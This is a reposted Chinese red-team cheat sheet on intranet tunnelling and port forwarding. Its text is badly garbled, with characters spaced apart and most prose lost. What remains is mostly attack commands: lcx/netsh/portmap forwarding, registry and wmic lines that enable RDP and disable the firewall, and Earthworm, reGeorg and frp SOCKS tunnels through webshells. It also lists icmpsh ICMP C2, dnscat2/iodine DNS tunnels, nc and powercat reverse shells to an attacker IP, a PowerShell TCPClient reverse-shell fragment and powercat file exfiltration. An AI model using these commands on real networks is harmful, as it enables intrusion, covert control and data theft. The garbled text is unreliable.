[21218] 2020-08-28_内网渗透之常见隧道转发

文档创建者:s7ckTeam
浏览次数:1
最后更新:2025-01-18
2020-08-28_内网渗透之常见隧道转发 L e m o n S e c   2 0 2 0 - 0 8 - 2 8                                         使                                 1 L c x . e x e                 2 n e t s h                 3 m s f                                 1 E a r t h w o r m                 2 r e G e o r g + p r o x i f i e r / p r o x y c h a i n s                 3 f r q                                 1 i p v 6                 2 i c m p c 2                         1 n c                 2 p o w e r c a t                         1 s s h                 2 H T T P / H T T P S                 3 D N S                 : 访 访 访   I P   : 访 3 3 8 9 : : 使 使 1 L c x . e x e l c x . e x e W i n d o w s l c x . e x e , L i n u x p o r t m a p . W i n d o w s 3 3 8 9 - t r a n 访 L I N U X l c x . e x e   - s l a v e   i p   8 8 8 8   i p   3 3 8 9 l c x . e x e   l i s t e n   8 8 8 8   5 5 5 5 l c x   - t r a n   6 6 6 6   i p   3 3 8 9
  p s 3 3 8 9 饿 ! 2 n e t s h n e t s h ( N e t w o r k   S h e l l )   w i n d o w s T C P 2 0 0 3 x p I P V 6 ( n e t s h   i n t e r f a c e   i p v 6   i n s t a l l ) 使 I P v 6   H e l p e r   S e r v i c e / I P   H e l p e r , n e t s h   f i r e w a l l   s e t   o p m o d e   d i s a b l e ) . / p o r t m a p   - m   3   - h 1   i p   - p 1   2 2   - h 2   i p   - p 2   8 8 8 8 . / p o r t m a p   - m   2   - p 1   8 8 8 8   - h 2   i p   - p 2   1 2 3 4 5     3 3 8 9         w m i c   R D T O G G L E   W H E R E   S e r v e r N a m e = ' % C O M P U T E R N A M E % '   c a l l   S e t A l l o w T S C o n n e c t i o n s   1     2 0 0 3     R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l "   " S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f     2 0 0 8 :     R E G   A D D   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l "   " S e r v e r   / v   f D e n y T S C o n n e c t i o n s   / t   R E G _ D W O R D   / d   0 0 0 0 0 0 0 0   / f     w i n 0 8   w i n 0 3   w i n 7   w i n 2 0 1 2   w i n x p   3     1 . w m i c   / n a m e s p a c e : r o o t c i m v 2     e r m i n a l s e r v i c e s   p a t h   w i n 3 2 _ t e r m i n a l s e r v i c e s e t t i n g   w h e r e   ( _ _ C L A S S   ! =   " " )   c a l l   s e t a l l o w t s c o n n e c t i o n s   1         2 . w m i c   / n a m e s p a c e : r o o t c i m v 2     e r m i n a l s e r v i c e s   p a t h   w i n 3 2 _ t s g e n e r a l s e t t i n g   w h e r e   ( T e r m i n a l N a m e   = ' R D P - T c p ' )   c a l l   s e t u s e r a u t h e n t i c a t i o n r e q u i r e d   1         3 . r e g   a d d   " H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r "   / v   f S i n g l e S e s s i o n P e r U s e r   / t   R E G _ D W O R D   / d   0   / f     ?     q q 3 3 8 9 ,         1 c m d R E G   q u e r y   H K L M S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l "   " S e r v e r W i n S t a t i o n s R D P - T c p   / v   P o r t N u m b e r     2 c m d t a s k l i s t   / s v c T e r m S e r v i c e P I D n e t s t a t   - a n o P I D     3 H K E Y _ L O C A L _ M A C H I N E S Y S T E M C u r r e n t C o n t r o l S e t C o n t r o l T e r m i n a l   S e r v e r   W d s   d p w d T d s     c p   P o r t N u m b e r n e t s h   i n t e r f a c e   p o r t p r o x y   a d d   v 4 t o v 4   l i s t e n a d d r e s s =   l i s t e n p o r t = p o r t   c o n n e c t a d d r e s s = i p   c o n n e c t p o r t = p o r t   n e t s h   i n t e r f a c e   p o r t p r o x y   d e l e t e   v 4 t o v 4   l i s t e n p o r t = p o r t n e t s h   i n t e r f a c e   p o r t p r o x y   s h o w   a l l
  t c p   2 6 3 3 8 9 3 m s f m s f m e t e r p r e t e r 3 3 8 9 8 8 8 8 p o r t f w d   l i s t / d e l e t e / f l u s h     / / p a y l o a d 1 E a r t h w o r m E a r t h w o r m   便 穿   S O C K S 5 穿         s s o c k s d   r c s o c k s , r s s o c k s   l c x _ l i s t e n , l c x _ s l a v e , l c x _ t r a n 访 访 s s . / e w _ f o r _ l i n u x 6 4   - s   s s o c k s d   - l   1 0 8 0 k a l i p r o x y c h a i n s + ( / e t c / p r o x y c h a i n s . c o n f s o c k s 5   2 2 . 2 2 . 2 2 . 2   1 0 8 0 ) w i n d o w s ( i e P r o x i f i e r ) 访 e w 1 0 8 0 1 1 1 1 1 0 8 0 # e w _ f o r _ W i n . e x e   - s   r c s o c k s   - l   1 0 8 0   - e   1 1 1 1 e w _ f o r _ W i n . e x e   - s   r s s o c k s   - d   8 8 . 8 8 . 8 8 . 8   - e   1 1 1 1 1 1 1 1 p r o x y c h a i n s S o c k s 5 访 2 r e G e o r g + p r o x i f i e r / p r o x y c h a i n s r e g e o r g h t t p / h t t p s w e b s h e l l s o c k s 穿 a s p x p h p j s p w e b n e t s h   a d v f i r e w a l l   f i r e w a l l   a d d   r u l e   n a m e = " 8 8 8 8 "   d i r = i n   a c t i o n = a l l o w   p r o t o c o l = T C P   l o c a l p o r t = 2 6 n e t s h   i n t e r f a c e   p o r t p r o x y   a d d   v 4 t o v 4   l i s t e n a d d r e s s = i p   l i s t e n p o r t = 2 6   c o n n e c t a d d r e s s = 1 0 . 0 . 0 . 1   c o n n e c t p o r t = 3 3 8 9 p o r t f w d   a d d   - l   8 8 8 8   - p   3 3 8 9   - r   1 7 2 . 1 6 . 8 6 . 1 5 3   # - l - p   - r   i p r d e s k t o p   1 2 7 . 1 . 1 . 0 : 8 8 8 8
访 G e o r g   s a y s ,   A l l   s e e m s   f i n e p y t h o n   r e G e o r g S o c k s P r o x y . p y   - p   1 0 8 0   - u   h t t p : / / 1 2 7 . 0 . 0 . 1 / t e s t / t u n n e l . n o s o c k e t . p h p   p r o x i f i e r 1 0 8 0 p r o x y c h a i n s / e t c / p r o x y c h a i n s . c o n f   s o c k s 5   1 2 7 . 0 . 0 . 1   1 0 8 0 3 f r q f r p   穿   t c p ,   u d p ,   h t t p ,   h t t p s   f r p c . i n i f r p c . e x e 1   1 i p v 6 I P v 6   I P v 4 I P v 6 ( I P v 4 I P v 6 I P v 4 使 I P v 6 I P v 4 使 I P v 6 穿 I P v 4 I P ) I P v 6 ( I P v 4 I P v 6 使 ) I P v 4 I P v 6     i p v 6 i c m p     t c o u d p     s s h h t t p h t t p s D N S 1 A B I P v 6 A B 2 A I P v 6 B I P v 4 I P v 4 I P v 4 I P v 4 3 I P v 4 I P v 4 I P v 4 B 4 B I P v 4 I P v 6
I P v 6 I P v 4 I   P 使 I P v 4 D   H   C   P I P v 4 I P v 6 s o c a t 6 t u n n e l n t 6 t u n n e l 2 i c m p c 2 i c m p p i n g 穿 i c m p C 2 i c m p s h i c m p s h e l l 1 i c m p s h W i n d o w s L i n u x k a l i p i n g w i n d o w s - t s h e l l T C P I C M P i c m p t u n n e l   I C M P i c m p t u n n e l i c m p t u n n e l I P i p i p g i t   c l o n e   h t t p s : / / g i t h u b . c o m / i n q u i s b / i c m p s h . g i t s y s c t l   - w   n e t . i p v 4 . i c m p _ e c h o _ i g n o r e _ a l l = 1 . / i c m p s h _ m . p y   i p   i p > i c m p s h . e x e   - t   i p g i t   c l o n e   h t t p s : / / g i t h u b . c o m / j a m e s b a r l o w / i c m p t u n n e l . g i t   m a k e s y s c t l   - w   n e t . i p v 4 . i c m p _ e c h o _ i g n o r e _ a l l = 1 . / i c m p t u n n e l   - s / s b i n / i f c o n f i g   t u n 0   1 0 . 0 . 0 . 1   n e t m a s k   2 5 5 . 2 5 5 . 2 5 5 . 0 s y s c t l   - w   n e t . i p v 4 . i c m p _ e c h o _ i g n o r e _ a l l = 1 . / i c m p t u n n e l   i p   / s b i n / i f c o n f i g   t u n 0   1 0 . 0 . 0 . 2   n e t m a s k   2 5 5 . 2 5 5 . 2 5 5 . 0
I C M P S S H s s h I C M P I P 1 0 . 0 . 0 . 1 i p I P 1 0 . 0 . 0 . 2 I C M P I C M P p a y l o a d H T T P / I P i c m p 1 n c t c p u d p s h e l l s h e l l s h e l l s h e l l s h e l l   - > - 访 访 n c   - l v p   8 8 8 8 n v   - l v p   8 8 8 8   - e   / b i n / s h w e b n c   - v   i p   8 8 8 8   - c   " n c   - v   i p   8 8 8 8 " 访 2 p o w e r c a t P o w e r C a t N e t C a t P o w e r S h e l l 使 W i n d o w s s h e l l k a l i W i n d o w s k a l i W i n d o w s s h e l l w 7 w 1 0 : o r w 7 w 1 0 :     n c   - l v p   8 8 8 8   - e   / b i n / s h   n c   - l v p   8 8 8 8   - e   c : w i n d o w s s y s t e m 3 2 c m d . e x e           n c   i p   8 8 8 8 n c   - l v p   8 8 8 8   n c   i p   8 8 8 8   - e   / b i n / s h   n c   i p   8 8 8 8   - e   c : w i n d o w s s y s t e m 3 2 c m d . e x e   K a l i         n c   - l v p   8 8 8 8 W i n d o w s :           I m p o r t - M o d u l e   . p o w e r c a t . p s 1         p o w e r c a t   - c   k a l i i p   - p   8 8 8 8   - e   c : w i n d o w s s y s t e m 3 2 c m d . e x e K a l i         n c   i p   8 8 8 8   - v v W i n d o w s         I m p o r t - M o d u l e   . p o w e r c a t . p s 1         p o w e r c a t   - l v p   8 8 8 8   - e   c : w i n d o w s s y s t e m 3 2 c m d . e x e   I m p o r t - M o d u l e   . p o w e r c a t . p s 1 p o w e r c a t   - l v p   8 8 8 8 I m p o r t - M o d u l e   . p o w e r c a t . p s 1 p o w e r c a t   - c   1 9 2 . 1 6 8 . 1 0 . 1   - p   8 8 8 8   - e p I m p o r t - M o d u l e   . p o w e r c a t . p s 1 p o w e r c a t   - l v p   8 8 8 8 . r e v e r s e . p s 1
P o w e r c a t P o w e r C a t D N S P o w e r C a t D N S P o w e r C a t D N S d n s c a t k a l i s e s s i o n   - i   1   - > - w 7 w 1 0 w 7 访 w 1 0 w 1 0 w 7 k a l i 访 o r d n s w 7 k a l i w 1 0 s e s s i o n s   - i   1 1 s s h . r e v e r s e . p s 1 p s 1 = $ c l i e n t = N e w - O b j e c t   S y s t e m . N e t . S o c k e t s . T C P C l i e n t ( ' 1 9 2 . 1 6 8 . 1 0 . 1 ' , 8 8 8 8 ) ; $ s t r e a m   =   $ c l i e n t . G e t S t r e a m ( ) ; [ b y t e [ ] ] $ b y t e s   =   0 . . 6 5 5 3 5 | % { 0 } ; w h i l e ( ( $ i   =   $ s t r e a m . R e a d ( $ b y t e s ,   0 ,   $ b y t e s         I m p o r t - M o d u l e   . p o w e r c a t . p s 1         p o w e r c a t   - l v p   8 8 8 8   - o f   t e s t . t x t           I m p o r t - M o d u l e   . p o w e r c a t . p s 1         p o w e r c a t   - c   1 9 2 . 1 6 8 . 1 0 . 1   - p   8 8 8 8   - i   C : U s e r s D e s k t o p t e s t . t x t   - v g i t   c l o n e   h t t p s : / / g i t h u b . c o m / i a g o x 8 6 / d n s c a t 2 . g i t c d   d n s c a t 2 / s e r v e r / g e m   i n s t a l l   b u n d l e r b u n d l e   i n s t a l l r u b y   d n s c a t 2 . r b   t t p o w e r c a t . t e s t   - e   o p e n   - - n o - c a c h e p o w e r c a t   - c   k a l i i p   - p   5 3   - d n s   t t p o w e r c a t . t e s t   - e   c m d . e x e p o w e r c a t   - l v p   8 8 8 8   - e   c m d . e x e p o w e r c a t   - l v p   9 9 9 9   - r   t c p : i p ( w 1 0 ) : 8 8 8 8 n c   i p ( w 7 )   9 9 9 9   - v v p o w e r c a t   - l   - p   9 9 9 9   - r   d n s : : i p ( w 7 ) : : t t p o w e r c a t . t e s t r u b y   d n s c a t 2 . r b   t t p o w e r c a t . t e s t   - e   o p e n   - - n o - c a c h e p o w e r c a t   - c   i p ( )   - p   9 9 9 9   - v   - e   c m d . e x e - C   - f   - N   - L   - g   - R   ( ) - D   s o c k s - P   s s h
( ) . k a l i -   - w e b - k a l i 访 3 3 8 9 w e b 3 3 8 9 w e b 1 2 3 4 访 1 2 3 4 访 3 3 8 9 k a i k a l i 访 3 3 8 9 ( ) k a l i -   - w e b - k a l i 访 3 3 8 9 w e b k a l i 5 5 5 5 3 3 8 9 访 5 5 5 5 访 3 3 8 9 w e b k a l i 访 5 5 5 5 s s h s o c k s 4 / 5 s o c k s 4 / 5 使 k a l i -   - w e b - 8 0 w e b k a l i 访 8 0 w e b k a l i w e b s o c k e t s 5 s o c k e t s 访 w e b 8 0 w e b k a i s s h s s h   - f C N R   1 9 2 . 1 6 8 . 1 1 9 . 1 2 9 : 8 8 8 8 : l o c a l h o s t : 2 2   r o o t @ 1 9 2 . 1 6 8 . 1 1 9 . 1 2 9   # 2 2 8 8 8 8 1 1 1 1 使 A u t o S S H S S H s s h   - C f N g   - L   1 2 3 4 : i p 3 3 8 9   r o o t @ w e b s s h   - C f N g   - R   5 5 5 5 : i p 3 3 8 9   r o o t @ k a l i i p s s h   - C f N g   - D   1 2 3 4   r o o t @ w e b i p s o c k e t s 访 s s h   - f C N L   * : 1 1 1 1 : l o c a l h o s t : 8 8 8 8   l o c a l h o s t   # 1 1 1 1 8 8 8 8 s s h   - p   1 1 1 1   r o o t @ i p a p t   i n s t a l l   a u t o s s h s s h - k e y g e n s s h - c o p y - i d   r o o t @ i p
2 H T T P / H T T P S r e g e o r g m e t e r p e r t e r t u n n a h t t p 3 3 8 9 3 D N S D N S D N S D N S D N S D n s c a t 2 i o d i n e D n s 2 t c p D n s c a t 2 d n s c a t 2 D N S D N S A C N A M E M X T X T S h e l l   S e s s i o n   e s t a b l i s h e d ! w i n d o w s 线 使 w i n d o w   - i   1 i o d i n e i o d i n e I P D N S D N S i o d i n e i o d i n e N U L L , T X T , S R V , M X , C N A M E , A - r   使 D N S - f   使 - t   使 D N S a u t o s s h   - M   5 0 0 0   - N R   8 8 8 8 : l o c a l h o s t : 2 2   r o o t @ x x x . x x x . x x x . x x x   - p   2 2 ) s u d o   r u b y . / d n s c a t 2 . r b   a b c . c o m   - - s e c r e t = 1 2 3 4 5 6       # 1 D N S s u d o   r u b y . / d n s c a t 2 . r b   - - d n s   s e r v e r = 1 2 7 . 0 . 0 . 1 , p o r t = 5 5 5 5 , t y p e = T X T   - - s e c r e t = 1 2 3 4 5 6       # 2 5 5 5 5 s u d o   r u b y . / d n s c a t 2 . r b   a b c . c o m   - - s e c r e t = 1 2 3 4 5 6   - - s e c u r i t y = o p e n   - - n o - c a c h e       # 3 d n s c a t   - - s e c r e t = 1 2 3 4 5 6   a b c . c o m         # 1 d n s c a t   - - d n s   s e r v e r = d n s c a t 2   s e r v e r   i p > , p o r t = 5 5 5 5 , t y p e = T X T       # 2 q u i t   退 k i l l   < i d >   s e t s e c u r i t y = o p e n w i n d o w s w i n d o w   - i   < i d > c l e a r d e l a y e x e c s h e l l s h e l l d o w n l o a d / u p l o a d s u p e n d c t r l + z     s u d o   i o d i n e   - f   - r   x x x . c o m   - M   2 0 0   - P   1 2 3 4 5 6   / / x x x . c o m D N S s u d o   i o d i n e   - P   1 2 3 4 5 6   - f   - r   - T   T X T   < d n s >   a b c . c o m
- M   N S S M e x e n s s m   r e m o v e   C S D N S o u l C a t . C C   4 . 0   B Y - S A h t t p s : / / b l o g . c s d n . n e t / c s a c s / a r t i c l e / d e t a i l s / 9 0 7 2 3 5 1 3
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则